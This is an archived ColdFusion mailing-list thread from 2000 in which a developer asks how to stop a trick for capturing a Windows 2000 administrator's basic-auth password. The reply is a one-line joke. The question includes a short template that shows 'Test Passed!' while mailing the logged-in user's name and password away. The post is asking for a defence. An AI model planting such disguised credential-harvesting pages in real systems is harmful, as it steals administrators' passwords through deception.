You could start by hiring a more intelligent Sys Admin. :)
Ken
----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?
Say I'm a developer, but not a not a SysAdmin.
It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:
Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:
<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>
How do I prevent this from working?
Thanks,
Jamie
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
------------------------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message
with 'unsubscribe' in the body to [EMAIL PROTECTED]
